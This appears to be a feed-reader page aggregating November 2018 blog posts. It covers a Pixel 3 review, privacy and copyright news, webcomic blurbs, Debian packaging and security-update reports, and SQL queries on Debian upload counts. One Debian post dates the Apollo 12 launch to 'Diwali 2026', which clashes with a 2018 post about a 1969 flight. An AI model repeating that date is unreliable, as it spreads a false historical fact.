8. Does it make sense for people to upgrade to a Pixel 3? I’m very happy I did, but I also acknowledge I’m a tech geek with a particular interest in photography, and I have enough money to indulge in this sort of thing (my other phone stopped working, which prompted me to get the Pixel 3, but let’s not pretend there wasn’t a good chance I would have gotten one anyway).

If you already have a Pixel 2 (or the first generation Pixel), some of the new capabilities of the Pixel 3 camera are going to be available to you with software upgrades. So unless you’re already at the part of your upgrade cycle where you’re getting a new phone anyway, you can probably sit tight and be fine. If you have the latest generation of “flagship” phone from Apple, Samsung or any other high-end phone manufacturer, you’re also probably just fine. Cameras are the new hotness on phones and every manufacturer will tell you why their iteration of cellphone camera tech is the best. It’s getting a little silly (some upcoming phones will have up to five cameras on the back of a phone, which seems much of a muchness), but on the other hand if you’ve got a high end, recent phone, you probably have a very good cell phone camera no matter what. Finally, if you just don’t care about photos, either from your cell phone or in general, the Pixel 3’s camera capabilities won’t matter regardless.

But if you are looking to upgrade, do like taking pictures and want to have the possibility of taking genuinely good photos with your phone, are fine with Google knowing everything about your digital life, and (not trivially) have between $800 and $1,000 to splash out on a phone (or have Verizon, which will let you slide it into your existing plan for a monthly fee), then I can really very highly recommend the Pixel 3. Aside from (yes) taking some of the best photos possible on a cell phone, it is also otherwise a very solid high-end phone, with some features (call screening, I’m looking at you) that are amazing differentiators, and an operating system upgrade cycle that means you always have the best, most recent version of Android first.

For me, in any event, it’s been well worth the upgrade, and not just for the photos, although the photos probably would have been enough. I really like this camera, and I really like this phone.

12:35

Privacy and Security of Data at Universities [Schneier on Security]

Interesting paper: "Open Data, Grey Data, and Stewardship: Universities at the Privacy Frontier," by Christine Borgman:

Abstract: As universities recognize the inherent value in the data they collect and hold, they encounter unforeseen challenges in stewarding those data in ways that balance accountability, transparency, and protection of privacy, academic freedom, and intellectual property. Two parallel developments in academic data collection are converging: (1) open access requirements, whereby researchers must provide access to their data as a condition of obtaining grant funding or publishing results in journals; and (2) the vast accumulation of "grey data" about individuals in their daily activities of research, teaching, learning, services, and administration. The boundaries between research and grey data are blurring, making it more difficult to assess the risks and responsibilities associated with any data collection. Many sets of data, both research and grey, fall outside privacy regulations such as HIPAA, FERPA, and PII. Universities are exploiting these data for research, learning analytics, faculty evaluation, strategic decisions, and other sensitive matters. Commercial entities are besieging universities with requests for access to data or for partnerships to mine them. The privacy frontier facing research universities spans open access practices, uses and misuses of data, public records requests, cyber risk, and curating data for privacy protection. This Article explores the competing values inherent in data stewardship and makes recommendations for practice by drawing on the pioneering work of the University of California in privacy and information security, data governance, and cyber risk.

12:00

Error'd: The Reason is NULL [The Daily WTF]

"Turns out that you shouldn’t use your edge browser to download Chrome because of potentially malicious links and...null," wrote Allen B.   Timothy W. writes, "On the surface, it...

10:35

Feeds | To man page... and beyond! [Planet GridPP]

To man page... and beyond! s.aragon 9 November 2018 - 8:27am

By Raniere Silva, Software Sustainability Institute. Documentation is, alongside version control, testing/continuous integration and others, one of the best practices for software development and is crucial for new users. In recent years, with the professionalization of open source driven by companies such as Red Hat, Anaconda (formerly Continuum Analytics), RStudio and Overleaf, we have seen not only releases come out faster but also documentation become richer.

10:28

It’s not a bucket [Seth's Blog]

Filling up a bucket might not be fast or easy, but you can easily measure your progress. Patience isn’t difficult, because you can see it getting filled.

Most of what’s important to us, though, doesn’t show itself this way.

Drip by drip is how we build things, but we can’t see it. One more “no,” one more failure, one more lesson learned.

It’s not a bucket, but it is a journey.

09:21

Publishing Giants Ask to Join Landmark Anti-Piracy Agreement [TorrentFreak]

Several Russian tech giants and media companies signed a landmark anti-piracy agreement last week. It’s designed to make infringing content less visible by sanitizing search results and rapidly removing content.

The memorandum was signed by media companies Channel One, the National Media Group, Gazprom-Media, the Internet Video Association, and the Association of Film and Television Producers. Yandex, Rambler Group, Mail.Ru Group, vKontakte, and RuTube signed on the tech platform side.

A centralized database, populated with links to sites that the entertainment industry groups claim are infringing their intellectual property, will be created in a matter of weeks. Search engines and hosting platforms will query the database every five minutes and remove infringing content within six hours.

While the agreement had broad support, Russia’s publishing companies were not present during the initial signing. However, telecoms regulator Roscomnadzor indicated that other rightsholders and tech companies were welcome to join following a successful application.

The publishers have now shown their hand in a letter from the Russian Book Union to Roscomnadzor head Alexander Zharov.

“I ask you to assist in organizing the signing of a memorandum with the Internet Copyright Association [AZAPI] representing the interests of most major Russian publishing houses,” the letter reads.

“Direct communications between the Internet Copyright Association (AZAPI) and Roskomnadzor will remove links from search engines issued on the basis of a constructive dialogue, without waiting for the adoption of the law to develop an optimal test model.”

The memorandum signed last week is valid until September 1, 2019. By then, the signatories expect new copyright legislation to be introduced, enshrining the terms of the memorandum in law.

In recent months, Yandex, in particular, has been under increasing pressure to do something about the large amounts of pirate content appearing in search results. Early September, before the signing of the memorandum, the battle again moved to the legal system.

In lawsuits filed with the Moscow City Court, Gazprom-Media outlets including TNT, TV-3, 2×2, complained that Yandex should “stop creating technical conditions that ensure the placement of [copyrighted] works on the Yandex.ru website.”

While that matter is still pending, the agreement reached last week (Yandex and Gazprom-Media both signed) could mean that Gazprom-Media withdraws its complaints against Yandex. Speaking with TASS, spokesperson Ekaterina Trofimova declined to rule out the possibility of peace breaking out before the trial, provisionally arranged for December 5, 2018.

Meanwhile, the Russian IPChain Association, which earlier this year signed an agreement to digitize the patent archives of Kyrgyzstan using blockchain technology, has said it’s ready to provide a technological solution for the anti-piracy database detailed in the memorandum.

“The main infrastructure solution for implementing the conditions of the memorandum is, of course, distributed registry technology,” said a letter penned by Maxim Proksh of the government-backed innovation group, Skolkovo Foundation.

“Based on this technology, a number of projects have already been created that have passed the pilot stage and have been commercialized. This is how the IPChain intellectual property management system would work to provide a technological solution for the implementation of the memorandum.”

Through the use of blockchain technology, it’s envisioned that trust will be built between companies like Yandex and Gazprom-Media.

“It is important that the blockchain will create and cultivate an environment of trust between search engines and rightsholders. Flat registries in the form of tables are hopelessly outdated, both technologically and morally,” Proksh added.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more.

08:49

But The Bond Is Real [Ctrl+Alt+Del Comic]

My first real horse, Rangely, was a dappled thoroughbred. The one that I got for free in Valentine because I’d pre-ordered the game. During a gunfight, he freaked out and ran into the middle of the bullets, and went down. That’s where I learned horses could get hurt, but you could save them with a magic potion.

Later, we rode off a cliff. I died, and respawned with some strange brown horse I didn’t know. That was how I learned your horse could die. Foreversies.

I didn’t like Brown Horse much, and none of the dull stable horses suited me either. So for the first time, I went out to find me a wild horse to call my own. I found a pack… a gaggle? A murder of thoroughbreds, and set my eyes on a beautiful, sleek black model with lots of potential in the speed department. He bucked me on my first attempt to tame him, and I had to chase him down all over again.

Finally, after some soothing words, wrastlin’ and some oat cakes, he was mine. My five-year-old, who was sitting with me at the time, said “You should name the horse ‘Stella.'”

I double-checked in the balls department, and said “This is a boy horse.”

My little guy said “And?”

So I named him Stella. And Stella has been my horse. For like, the past twenty hours of gameplay, most of it fucking around in the wilderness, it’s just been me and Stella.

And then, being chased by bounty hunters like you do, Stella took too many bullets, and collapsed, throwing me to the ground. Rather than run for cover, I ran to Stella, to try and administer care. But I, too, took too many bullets, and died.

I respawned face-to-face with Brown Horse, and my heart sank. I ran back to the spot of our showdown, and all that was left was my saddle, lying there in a bush.

That was how I learned my heart could break.

(And that I need to save more often.)

Oh and hey. Last call on these posters. Orders close Monday. The variant is just about gone, and the print run for the other will be determined by orders (rounded up because we can’t print them in odd denominations like “63” or whatever) so there may be some extras at a later date. But ordering right now will be the only chance to have your poster signed.

08:35

Jaldhar Vyas: Sal Mubarak 2075 [Planet Debian]

Best wishes to one and all for a prosperous and auspicious Gujarati New Year (V.S. 2075 called sadharana.)

We have spent Diwali week this year in sunny Orlando Florida doing various touristy things. (None of which involve a certain copyright hoarding mouse I'm happy to say.) I didn't put up a [VAC] notice because I haven't really been doing anything much in Debian of late. That is something I hope to change in the coming year but I'll think about that later. Right now I'm excited about the day trip we're going to make to Cape Canaveral. So here is a picture of Apollo 12, one of the biggest fireworks Man has ever sent to the Gods on Diwali 2026. Well, the pedant in me is forced to point out the launch date was actually Labh Pancham but that's close enough.

08:14

Europe's collision course with copyright censorship: where we stand today [Cory Doctorow – Boing Boing]

I've just published a comprehensive explainer on Medium about the EU's new Copyright Directive, which was sabotaged at the last minute, when MEP Axel Voss snuck in the long-discredited ideas of automatically censoring anything a bot thinks infringes copyright and banning unpaid links to news articles.

After a million Europeans signed a petition calling for a debate on the new proposals, a divided opposition failed to kill them. But hope is not lost: the new Italian government has changed position on the proposals and now the opposition constitutes a potential "blocking minority" that could kill the whole thing -- provided they could work together.

The new Directive is now in the “trilogues” — closed-door negotiations between the E.U.’s Parliament and individual national governments. Normally, these are a formality that takes place out of public view. However, the current trilogue is both more contested and more public than any in the E.U.’s history.

The European Court of Justice has ruled that Europeans are entitled to know what happens in these trilogue negotiations, and German Pirate Party MEP Julia Reda has pledged to publish the negotiating documents (and she’s kept her word).

What’s more, the trilogues coincide with political changes in Italy, and the Italian government has withdrawn its support for Articles 11 and 13. This brings the proportion of Europeans who oppose these articles past the critical threshold of 35%, a theoretical “blocking minority” that could scuttle the entire proposal (assuming they can avoid the trap the opposition fell into last time: agreeing that these rules aren’t appropriate but disagreeing on what to do about it).

It’s not clear what will happen next. If these rules are meant to cut Big Tech down to size, they’re sure to disappoint. Google, Facebook, Twitter, Apple, and the other tech giants are the only companies big enough to be able to afford the hundreds of millions it will cost to follow the new rules. Small competitors in the E.U. just don’t have that kind of cash. Freed from any threat of competition from E.U. companies, dominant tech platforms will be left to grow unchecked. They will present even more of a threat to democratic discourse, privacy, and competition than they already do.

Europe’s Copyright Rules Will Stifle Free Expression [Cory Doctorow/Medium]

08:07

News Post: The Gnoll Set [Penny Arcade]

Tycho: I don’t know if it kept me up all night or anything, but I did spend some time, maybe a… day, considering some fairly heady - and footy - topics.  I feel like the next step is to ask my friends who are furs.  Indeed, I shoulda fuckin’ started there.  Call it a hunch, but my guess is that this is a question their people have already answered a million years ago. I’m heading up to Victoria on that Clipper they got, to take part in Desert Bus 2018.  Brenna has made and subsequently framed a special Magic: The Gathering themed cross stitch that is sure…

Comic: The Gnoll Set [Penny Arcade]

New Comic: The Gnoll Set

07:28

Prototyping the betentacled, inflatable soft robots of zero gee [Cory Doctorow – Boing Boing]

The MIT Media Lab's Spatial Flux Project was created by Carson Smuts and Chrisoula Kapelonis to imagine and prototype soft inflatable robots that would be designed to operate in zero-gee, where there is no up or down and "we do not have to contend with architecture's greatest arch-nemesis, gravity."

Their work, a set of shoes-on-a-snake weird pneumatic tentaclebots, is brilliant and Gigeresque.

In the City Science group, we explore the diversity of formal arrangements necessary to accommodate the spatial gradients of our lives—at work, rest, and play. We are in the process of developing a full-scale, multi-modal kinetic space (escPod); the moment the human body surrenders itself to space is our inspiration: sitting at a desk, lounging on a couch, or in a deep slumber.

How do we define surface architecturally when our current gravity-based vocabulary was not born of zero gravity and will not suffice? What opportunities can this state of flux provide for architects when designing for the body? Architects are married to an XY (north/south) cartesian grid, with Z (gravity) being the main point of reference for many architectural elements. We would like to force ourselves to imagine these elements without an XYZ reference, rethinking our descriptions of them.

Spatial Flux: Body and Architecture in Space [Carson Smuts and Chrisoula Kapelonis/MIT Media Lab]

(via JWZ)

Microsoft's best Windows 10 customers bear the brunt of the latest license glitch [Cory Doctorow – Boing Boing]

If you paid extra for Windows 10 "Pro," Microsoft had an unpleasant surprise for you: a misconfiguration in the company's license server resulted in the oldest Win 10 Pro installs (that is, those owned by Microsoft's earliest adopting customers) being downgraded to Windows 10 Home, with users' screens plastered with watermarks chiding them for not paying for their licenses (this went over great for everyone who was standing in front of an audience giving a presentation, apparently).

After a period of initial confusion, Microsoft finally admitted something was broken.

Shopify no-platforms Nazis (but not Breitbart) [Cory Doctorow – Boing Boing]

Canadian turnkey e-commerce giant Shopify has kicked its farthest-right customers off the service, banning made-in-Canada racists like the Proud Boys, but not wink-nudging white supremacists like Breitbart.

Congresswoman Alexandria Ocasio-Cortez can't afford to rent a DC apartment [Cory Doctorow – Boing Boing]

Proud Democratic Socialist Alexandria Ocasio-Cortez ran an insurgent campaign (working nights as a bartender in NYC with her campaigning clothes stashed in a paper bag behind the bar, changing after her shift and working the streets) that conquered New York, went national, and emboldened a "progressive caucus" of new Democratic legislators: now she's going to Congress to serve as the youngest woman ever elected to the lower house. Only one problem: she can't afford to rent a DC apartment for the three months between the election and her swearing-in, when she'll start drawing her Congressional salary.

Choire Sicha, New York Times advice columnist [Cory Doctorow – Boing Boing]

Internet funnyperson Choire "Awl" Sicha (previously) has a new gig: New York Times advice columnist; Sicha is not fucking around either: "The only circumstance in which you can ask this woman out is if she sends you a literal ink-on-paper invitation to do so, like, in calligraphy and maybe with a seal stamped in wax, which would be awesome. (Also might mean she’s a vampire?) But, sure, you can totally ask her out if you don’t care about (1) her security about working with men in any capacity forever or (2) your career! Then have a blast, cannonball as many lives as possible on your way down the trash chute." (via Kottke)

07:00

Kurt Kremitzki: Free Software Activities in October 2018 [Planet Debian]

Intro

Welcome to another monthly summary of my free software work. Currently I'm focusing on improving the state of packaging for FreeCAD and its ecosystem of dependencies and related packages in Debian Science. Additionally, I recently revived the FreeCAD Community Extras PPA as a way of staging these packages out to users for testing. If you are a FreeCAD user, developer, or simply a user of one of these packages, I would greatly appreciate your feedback and testing to identify bugs while my packages wait to make it into the Debian archive.

However, in the long term, I plan to move away from spending so much time on Debian packaging and return to FreeCAD core development, and a special not-so-secret related project: PostCAD, providing OpenCASCADE geometry & topology bindings plus CAD data and filetype format support for PostgreSQL, a la PostGIS. The goal is to build this out as a rich backend which FreeCAD can talk to about neat CAD stuff. It's a heaping of work, though, so I don't expect to have a public release until mid or late 2019.

I would like to find others who are interested in contributing to FreeCAD ecosystem packaging for mentorship. That way, my efforts are maintained by the community and the quality and availability of packages won't wane with my attention on them. Since FreeCAD participates in Google Summer of Code, this would be a great opportunity for interested university students to learn Debian packaging and improve the state of science & engineering software on Debian.

Anyway, on to my summary!

Debian News

This month, I officially became a Debian Maintainer. This is a basic level of formal membership in the Debian project, and it comes with limited upload rights to the archive. I can only upload packages for which I am marked as a maintainer, for example FreeCAD.

I took advantage of this to upload some improvements for FreeCAD which I had been sitting on. After a few tweaks, the package was ready for an upgraded upload from Experimental to Unstable, which begins the process of candidacy for Testing, the release pocket for the upcoming Debian 10.

Debian FreeCAD Gets Qt 5

Most important about this upload, though, was that FreeCAD is finally being built with Qt 5 support. While Qt 5 had been working for quite a while, we were waiting on a dependency to be uploaded to Debian, PySide 2, which finally was uploaded this summer. Because this is a big switch to flip, any testing and reporting of bugs for this Debian package would be appreciated!

FreeCAD Package Structure Reorganization

One of the other major packaging changes for FreeCAD 0.17 is that the package is no longer a single, monolithic freecad package. We now have:

  • a freecad metapackage, which installs the other packages
  • common files and resources (e.g. images) in freecad-common
  • freecad-runtime contains Python 2/3 compatible runtime files
  • the executable built against Python 2, freecad-python2
  • and the library files used by the executable, libfreecad-python2-0.17

There are several advantages to this approach. The first is that since freecad-common and freecad-runtime are just pictures, Python scripts, and the like, we can save space in the archive by only needing one copy of the package, instead of one for each supported architecture. For freecad-python2 and libfreecad-python2-0.17, one can see the advantage in the name: since these are Python 2 specific, we will soon be able to provide their Python 3 counterparts.

Ideally, by the time of the Debian 10 release, the FreeCAD 0.17 package will provide both Python 2 and 3 supported versions, and which one you want to use can be switched between using the alternatives system, which I will explain later in this post.

FreeCAD Python 3 Imminent

Like Qt 5, FreeCAD has supported Python 3 for quite some time. (Workbenches and 3rd party code are another story.) However, in Debian, a Python 3-enabled FreeCAD package is blocked by the pending upload of pivy 0.6. I helped coordinate the upstream release of this package but due to issues with its dependency Coin3D the upload is stalled until those issues are resolved.

Community Extras PPA - Early Package Previews

Now that we have the Community Extras PPA, it serves as a convenient location for me to upload packages as soon as I have one completed and ready for testing. Here are my uploads this month.

Gmsh 4

Gmsh has released a major version upgrade, which includes removing the experimental Java API and introducing Julia bindings, although this package doesn't do anything with them. The current version in the Debian archives is 3.0.6.

This package is only available on Bionic (Ubuntu 18.04) due to its dependencies. I hadn't tried on Cosmic (Ubuntu 18.10) since I worked on this in the beginning of October and it wasn't released yet.

Calculix 2.14

CalculiX in Debian is currently several versions behind (2.11) so I got a request to package this. However, CalculiX actually spans several packages, but calculix-ccx, the solver, is the only one used by FreeCAD, so unlike the other packages, this one is not quite ready for Debian until the other ones are done as well, since they are separate source packages.

This package is available on Bionic and Xenial (Ubuntu 16.04).

Translated FreeCAD-Doc Packages

One of the big areas for improvement in FreeCAD is the state of its documentation, and I'm glad to announce that one big improvement is on its way. I have been working on a standalone freecad-doc package, since it was removed from the Debian archive for being derived from pre-compiled binary files. This package involves using a local synced copy of the FreeCAD Wiki text and images, and using the script that was used to generate the aforementioned binary files.

The main improvement my package offers is support for the two most complete translations of the FreeCAD wiki, French and Italian. This is accomplished by making freecad-doc a metapackage which depends on any one of freecad-doc-en, -it, or -fr being installed. Then, the relevant files in freecad-doc upon which freecad will call are in fact managed symlinks to the appropriate translations. The symlinks are managed by the DebianAlternatives system (see update-alternatives(1).)

In order to switch between translations if more than one is installed, you can run sudo update-alternatives --config freecad-doc. This will control the in-program help for FreeCAD, so when you click the "What's this?" button, the resultant help page will be the translated version.

Additionally, compiled PDFs of the FreeCAD help are provided for all three languages.

One result of the nature of this package is that it is quite large: each freecad-doc translated package weighs in about 300 MB so the combined size is about 1.2 GB, per Ubuntu distribution.

As a result, this package is only available on Bionic and Xenial.

PyCOLLADA 0.6, now with Python 3!

Another package which is fairly out of date in Debian (version 0.4 present), I decided to update it since pycollada is a dependency of FreeCAD and I am intrigued by the possibilities of the COLLADA (COLLAborative Design Activity) format. This allows for interchange with interactive 3D applications like Blender.

The big news with this package is that Python 3 support is now available, so I updated the source packaging to provide both Python 2 and 3 packages.

Again due to dependencies, it's only available on Cosmic and Bionic.

Sponsors

My work on Debian Science and FreeCAD is supported by my patrons at https://patreon.com/kkremitzki. Thank you all very much!

If you appreciate my work as described in this post, any level of support is greatly appreciated, including moral support!

Social Media

You can follow me on Twitter at @thekurtwk. I'm also currently working on a Twitch streaming setup, which I hope to have ready by the end of the year! I'll be trying out some live programming, engineering, and Linux gaming. You can find me at twitch.tv/kkremitzki.

06:42

Bruce Sterling on architecture, design, science fiction, futurism and involuntary parks [Cory Doctorow – Boing Boing]

In 1918, there was plenty of speculation about 2018; in 2018, no one is talking about 2118. Bruce Sterling discusses the relationship of industrial design to science fiction; the New Aesthetic and Turinese architecture; and many other subjects with Benjamin Bratton. (via Beyond the Beyond)

05:28

Master Bastion of the Indie Rock Scene [Diesel Sweeties webcomic by rstevens]

this is a diesel sweeties comic strip

Tonight’s comic is about the master bastion of the indie rock scene

Girl Genius for Friday, November 09, 2018 [Girl Genius]

The Girl Genius comic for Friday, November 09, 2018 has been posted.

02:42

Fantastic Voyage [QC RSS]

RIP Claire

02:21

Classic Amiga emulation on the X5000 [OSNews]

Speaking of Amiga, Mark Round has written a great blog post about running old AmigaOS 3.x software on AmigaOS 4, and the best ways to do so.

While I've been having a lot of fun with the new software written specifically for AmigaOS 4, the bulk of my software is still "classic" titles that used to run on my A1200. One of the first things I did when I set up my X5000 was to transfer my old Amiga's hard drive over so I could continue running this library of software. I also wanted to set up an emulation of my A1200 so I can quickly launch a classic Workbench 3.9 session and pick up all my old projects and bits of code I'd written over the years. Fortunately, the X5000 and AmigaOS 4 offer a variety of ways of running all your old software.

Icaros Desktop 2.2.4 released [OSNews]

A brand new version of Icaros Desktop is now available to everyone. V2.2.4 includes new brilliant features and applications, small but important fixes and, for you Amiga lovers, a vintage GUI that can be selected after installation, which reproduces the plain old Amiga OS 3.1 interface.

Icaros Desktop is one of the easiest ways to experience AROS, the open source Amiga-like operating system for x86.

00:00

Markus Koschany: My Free Software Activities in October 2018 [Planet Debian]

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • Again Yavor Doganov saved the day by porting monster-masher away from obsolete libraries like esound and gconfmm (RC, #848052, #856086, #885037). I reviewed and sponsored the package for him again.
  • Gürkan Myczko prepared a new upstream version of greed, a classic text-console game. I provided a desktop icon and sponsored the upload.
  • Several games failed to build from source because freetype-config is gone and pkg-config must be used from now on. That required RC bug fixes in asc (#887600), brutalchess (#892337, patch by Reiner Herrmann), cube2font (#892330, patch by Reiner Herrmann with additional updates by Martin Erik Werner) and scorched3d (#892434, patch by Adrian Bunk).
  • I packaged new upstream versions of pcsx2, a Playstation 2 emulator, to fix RC bug #907411, also pygame-sdl2, renpy and bzflag.
  • I refreshed the packaging of abe, asc-music, amoebax, angrydd, airstrike, burgerspace, berusky2 and berusky-data.
  • Dima Kogan approached me about improving the current Bullet packaging and provided patches to build the double-precision library versions too.  Bullet is a state-of-the-art C++ library for 3D collision detection, soft body and rigid body dynamics. I once introduced it to Debian because it was a required build-dependency of freeorion. Nowadays it powers several scientific applications. I still maintain it because I think it is a very useful library, e.g. used among others by openrobotics.
  • I spent most of the time this month on updating Teeworlds. Since I run a Teeworlds server myself I discovered a remote denial-of-service vulnerability first hand. Of course my server was not the only target and the upstream developers had already released a fix. But I only became aware of it by chance. So I requested CVE-2018-18541, packaged the latest upstream release 0.7.0 and also prepared a security update for Stretch, released as DSA-4329-1.
  • Last but not least I sponsored a new game created and prepared by Gerardo Ballabio called galois. It is a tetris-like game with special features like 3D and different brick shapes. It is currently waiting in the NEW queue.

Debian Java

Misc

  • I sponsored android-platform-system-core for Kai-Chung Yan and did a non-maintainer upload for eboard, a chess client to fix RC bug #893167. I forwarded some patches and I hope we will see another upstream release in the near future that addresses some issues.
  • I packaged a new upstream release of ublock-origin.

Debian LTS

This was my thirty-second month as a paid contributor and I have been paid to work 30 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 08.10.2018 until 14.10.2018 and 29.10.2018 until 4.11.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVE in gnulib, otrs2, tcpreplay, net-snmp, ghostscript, paramiko, pyopenssl, qpdf, requests, glassfish, imagemagick, tomcat8, tomcat7, moin, glusterfs, mono, tiff, systemd, network-manager, shellinabox, openssl, curl, squid3, icecast2, sdl-image1.2, libsdl2-image, mkvtoolnix, libapache-mod-jk, mariadb-10.0, mysql-connector-java and jasper.
  • There was a problem with our list manager and some announcements could not be preserved.
  • DLA-1535-1. Issued a security update for php-horde fixing 1 CVE.
  • DLA-1536-1. Issued a security update for php-horde-core fixing 1 CVE.
  • DLA-1537-1. Issued a security update for php-horde-kronolith fixing 1 CVE.
  • DLA-1540-1. Issued a security update for net-snmp fixing 1 CVE.
  • DLA-1543-1. Issued a security update for gnulib fixing 1 CVE.
  • DLA-1544-1. Issued a security update for tomcat7 fixing 1 CVE.
  • DLA-1545-1. Issued a security update for tomcat8 fixing 1 CVE.
  • DLA-1546-1. Issued a security update for moin fixing 1 CVE.
  • DLA-1552-1. Issued a security update for ghostscript fixing 3 CVE.
  • DLA-1564-1. Issued a security update for mono fixing 1 CVE.
  • DLA-1565-1. Issued a security update for glusterfs fixing 5 CVE.

ELTS

Extended Long Term Support (ELTS) is a project led by Freexian to further extend the lifetime of Debian releases. It is not an official Debian project but all Debian users benefit from it without cost. The current ELTS release is Debian 7 “Wheezy”. This was my fifth month and I have been paid to work 15 hours on ELTS.

  • I was in charge of our ELTS frontdesk from 15.10.2018 until 21.10.2018 and I triaged CVE in chromium-browser, ghostscript, openexr, unzip, virtualbox, elfutils, liblivemedia, exiv2, movabletype-opensource, qemu, qemu-kvm, tiff and tcpreplay.
  • ELA-50-1. Issued a security update for linux fixing 34 CVE.
  • ELA-51-1. Issued a security update for tomcat7 fixing 1 CVE.
  • ELA-54-1. Issued a security update for curl fixing 1 CVE.
  • ELA-55-1. Issued a security update for firmware-nonfree fixing 8 CVE.

Thanks for reading and see you next time.

Thursday, 08 November

23:14

Nicolas Dandrimont: Record number of uploads of a Debian package in an arbitrary 24-hour window [Planet Debian]

Since Dimitri has given me the SQL virus I have a hard time avoiding opportunities for twisting my brain.

Seeing the latest post from Chris Lamb made me wonder: how hard would it be to do better? Splitting by date is rather arbitrary (the split may even depend on the timezone you’re using when you’re doing the query), so let’s try to find out the maximum number of uploads that happened for each package in any 24 hour window.

First, for each upload, we get how many uploads of the same package happened in the subsequent 24 hours.

SELECT
  source,
  date,
  (
    SELECT
      count(*)
    FROM
      upload_history AS other_upload
    WHERE
      other_upload.source = first_upload.source
      AND other_upload.date >= first_upload.date
      AND other_upload.date < first_upload.date + '24 hours') AS count
  FROM
    upload_history AS first_upload

For each source package, we want the maximum count of uploads in a 24 hour window.

SELECT
  source,
  max(count)
FROM
  upload_counts
GROUP BY
  source

We can then join both queries together, to get the 24-hour window in which the most uploads of a given source package has happened.

WITH upload_counts AS (
  SELECT
    source,
    date,
    (
      SELECT
        count(*)
      FROM
        upload_history AS other_upload
      WHERE
        other_upload.source = first_upload.source
        AND other_upload.date >= first_upload.date
        AND other_upload.date < first_upload.date + '24 hours') AS count
    FROM
      upload_history AS first_upload
)
SELECT
  source,
  date,
  count
FROM
  upload_counts
INNER JOIN (
  SELECT
    source,
    max(count) AS max_uploads
  FROM
    upload_counts
  GROUP BY
    source
  ) AS m
  USING (source)
WHERE
  count = max_uploads
  AND max_uploads >= 9
ORDER BY
  max_uploads DESC,
  date ASC;

The results are almost the ones Chris has found, but cl-sql and live-config now have one more upload than live-boot.

       source       |          date          | count 
--------------------+------------------------+-------
 cl-sql             | 2004-04-17 03:34:52+00 |    14
 live-config        | 2010-07-15 17:19:11+00 |    14
 live-boot          | 2010-07-15 17:17:07+00 |    13
 zutils             | 2010-12-30 17:33:45+00 |    11
 belocs-locales-bin | 2005-03-20 21:05:44+00 |    10
 openerp-web        | 2010-12-30 17:32:07+00 |    10
 debconf            | 1999-09-25 18:52:37+00 |     9
 gretl              | 2000-06-16 18:53:11+00 |     9
 posh               | 2002-07-24 17:04:46+00 |     9
 module-assistant   | 2003-09-11 05:53:18+00 |     9
 live-helper        | 2007-04-20 18:16:38+00 |     9
 dxvk               | 2018-11-06 00:04:02+00 |     9
(12 lines)

Thanks to Adrian and Chris for the involuntary challenge!

22:28

Chris Lamb: Record number of uploads of a Debian package in a day [Planet Debian]

Previously, on IRC...

 * bunk looks at dxvk and wonders whether 9 uploads of a package on 1 day are a record

According to the Ultimate Debian Database, it turns out it isn't:

udd=> SELECT source, DATE(date) as day, COUNT(source) FROM upload_history
      GROUP BY (source, day)
      ORDER BY count DESC LIMIT 10;

      source       |    day     | count
--------------------+------------+-------
live-config        | 2010-07-15 |    13
live-boot          | 2010-07-15 |    13
cl-sql             | 2004-04-17 |    13
zutils             | 2010-12-30 |    11
openerp-web        | 2010-12-30 |    10
belocs-locales-bin | 2005-03-20 |    10
debconf            | 1999-09-25 |     9
dxvk               | 2018-11-06 |     9
live-helper        | 2007-04-20 |     9
module-assistant   | 2003-09-11 |     9
(10 rows)

Feeds

FeedRSSLast fetchedNext fetched after
XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
a bag of four grapes XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
A Smart Bear: Startups and Marketing for Geeks XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
All - O'Reilly Media XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Anarcho's blog XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Ansible XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Bad Science XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Black Doggerel XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Blog – Official site of Stephen Fry XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Broodhollow XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Charlie Brooker | The Guardian XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Charlie's Diary XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Chasing the Sunset - Comics Only XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Clay Shirky XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Coding Horror XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Cory Doctorow – Boing Boing XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Cory Doctorow's craphound.com XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Ctrl+Alt+Del Comic XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Cyberunions XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
David Mitchell | The Guardian XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Debian GNU/Linux System Administration Resources XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Deeplinks XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Diesel Sweeties webcomic by rstevens XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Dork Tower XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Edmund Finney's Quest to Find the Meaning of Life XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Eerie Cuties XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
EFF Action Center XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Enspiral Tales - Medium XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Erin Dies Alone XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Events XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Falkvinge on Liberty XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Flipside XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
